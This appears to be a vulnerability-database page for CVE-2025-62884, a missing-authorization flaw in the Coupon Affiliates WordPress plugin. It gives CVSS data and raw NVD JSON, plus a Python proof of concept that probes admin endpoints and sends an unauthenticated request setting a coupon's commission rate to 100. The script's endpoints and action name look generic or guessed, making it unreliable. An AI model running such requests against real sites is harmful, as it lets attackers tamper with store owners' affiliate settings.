Security Vulnerability Report
中文
CVE-2025-62884 CVSS 5.3 MEDIUM

CVE-2025-62884

Published: 2025-10-27 02:15:47
Last Modified: 2026-04-27 17:16:34

Description

Missing Authorization vulnerability in Elliot Sowersby / RelyWP Coupon Affiliates woo-coupon-usage allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Coupon Affiliates: from n/a through <= 7.2.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Coupon Affiliates plugin <= 7.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62884 PoC - Missing Authorization in Coupon Affiliates # Target: WordPress with Coupon Affiliates plugin <= 7.2.0 # Author: Security Researcher import requests import sys TARGET_URL = "http://target-wordpress-site.com" def exploit_coupon_affiliates(): """Exploit missing authorization in Coupon Affiliates plugin""" # Attack Vector 1: Access admin functionality without authentication endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php", f"{TARGET_URL}/wp-json/wc/v3/coupon-affiliates", f"{TARGET_URL}/wp-admin/admin.php?page=coupon-affiliates" ] print("[*] Testing CVE-2025-62884 - Missing Authorization in Coupon Affiliates") print(f"[*] Target: {TARGET_URL}") # Test unauthenticated access to protected functions for endpoint in endpoints: try: response = requests.get(endpoint, timeout=10) if response.status_code == 200: print(f"[+] Endpoint accessible without auth: {endpoint}") print(f"[+] Response preview: {response.text[:200]}...") except requests.RequestException as e: print(f"[-] Failed to access {endpoint}: {e}") # Attack Vector 2: Modify coupon settings via POST payload = { 'action': 'coupon_affiliates_save', 'coupon_id': '1', 'commission_rate': '100', 'nonce': '' # Missing or bypassable nonce validation } print("[*] Sending unauthorized modification request...") try: response = requests.post( f"{TARGET_URL}/wp-admin/admin-ajax.php", data=payload, headers={'Content-Type': 'application/x-www-form-urlencoded'} ) if response.status_code == 200: print(f"[+] Request successful - Authorization bypass confirmed") print(f"[+] Response: {response.text}") except requests.RequestException as e: print(f"[-] Request failed: {e}") if __name__ == "__main__": exploit_coupon_affiliates()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62884", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:47.220", "lastModified": "2026-04-27T17:16:34.163", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Elliot Sowersby / RelyWP Coupon Affiliates woo-coupon-usage allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Coupon Affiliates: from n/a through <= 7.2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woo-coupon-usage/vulnerability/wordpress-coupon-affiliates-plugin-7-0-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}